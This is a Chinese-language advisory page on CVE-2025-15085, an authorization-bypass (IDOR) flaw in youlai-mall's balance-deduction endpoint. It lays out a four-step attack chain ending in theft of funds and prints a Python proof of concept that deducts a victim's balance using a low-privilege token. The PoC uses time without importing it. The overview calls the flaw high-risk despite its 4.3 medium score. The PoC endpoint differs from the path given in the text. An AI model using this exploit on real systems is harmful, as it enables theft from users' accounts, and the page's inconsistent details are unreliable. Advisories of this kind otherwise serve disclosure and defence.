CVE-2025-15085 CVSS 4.3 中危

CVE-2025-15085: youlai-mall 余额扣减功能权限绕过漏洞

披露日期: 2025-12-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15085

漏洞类型

权限绕过/不安全的直接对象引用(IDOR)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

youlaitech youlai-mall

漏洞概述

CVE-2025-15085是youlaitech公司开发的youlai-mall电商系统中存在的一处高危安全漏洞。该漏洞影响youlai-mall 1.0.0和2.0.0版本，漏洞位于会员余额管理功能中。由于系统对扣款操作(deductBalance)缺乏充分的授权验证，攻击者可以通过构造恶意请求绕过正常的权限检查，对任意用户账户进行余额扣减操作。此漏洞被评定为CVSS 4.3分(中危)，攻击向量为网络形式，无需用户交互，但需要低权限认证。漏洞利用代码已在互联网公开，厂商在收到安全通知后未做出任何回应。由于该漏洞影响电商系统的核心财务功能，可能导致用户资产损失，具有较高的实际危害性。

技术细节

该漏洞存在于youlai-mall的会员控制器(MemberController.java)中，具体位于deductBalance方法。问题根源在于Balance Handler组件对扣款操作的身份验证和授权检查不充分。攻击者通过分析API接口参数，利用IDOR(不安全的直接对象引用)漏洞，通过修改请求中的目标用户ID或相关标识符，在拥有低权限账户的情况下即可对其他用户的余额进行非法扣减操作。漏洞接口路径为mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java。攻击者可通过拦截正常扣款请求，修改目标用户参数后重放，或直接构造针对目标用户的扣款请求来完成攻击。由于系统未验证当前登录用户与扣款目标的一致性，导致权限控制失效。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者注册youlai-mall平台账号，获取低权限账户token，分析API接口结构和扣款功能参数

STEP 2

步骤2: 漏洞探测

访问余额扣减接口(mall-ums/ums/controller/app/MemberController.java的deductBalance方法)，分析请求参数

STEP 3

步骤3: IDOR利用

通过拦截正常扣款请求，修改userId参数为其他用户ID，绕过授权检查向目标用户发起扣款请求

STEP 4

步骤4: 资产窃取

成功执行扣款操作后，将目标用户余额转入攻击者控制的账户或进行消费，完成资金盗窃

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-15085 PoC - youlai-mall IDOR Balance Deduction
# Target: youlai-mall 1.0.0/2.0.0

TARGET_URL = "http://target.com/api/member/balance/deduct"
ATTACKER_TOKEN = "attacker_legitimate_token"  # Low privilege user token
TARGET_USER_ID = 12345  # Victim user ID to deduct balance from

headers = {
    "Authorization": f"Bearer {ATTACKER_TOKEN}",
    "Content-Type": "application/json"
}

# Malicious payload - exploiting IDOR to deduct victim's balance
payload = {
    "userId": TARGET_USER_ID,
    "amount": 1000,
    "orderNo": "MALICIOUS_" + str(int(time.time()))
}

response = requests.post(TARGET_URL, headers=headers, json=payload, verify=False)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

影响范围

youlaitech youlai-mall 1.0.0

youlaitech youlai-mall 2.0.0

防御指南

临时缓解措施

由于厂商未回应安全通知，建议临时关闭余额扣减API接口的外部访问，或通过WAF/网关层添加请求过滤规则限制扣款接口的调用频率和参数范围。同时在业务层添加交易风控机制，对异常扣款行为进行实时监控和告警。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15085
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15085
3 Details https://www.cvedetails.com/cve/CVE-2025-15085/
4 VulDB https://vuldb.com/cve/CVE-2025-15085
5 Link https://github.com/Hwwg/cve/issues/26
6 Link https://vuldb.com/?ctiid.338413
7 Link https://vuldb.com/?id.338413
8 Link https://vuldb.com/?submit.708175

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表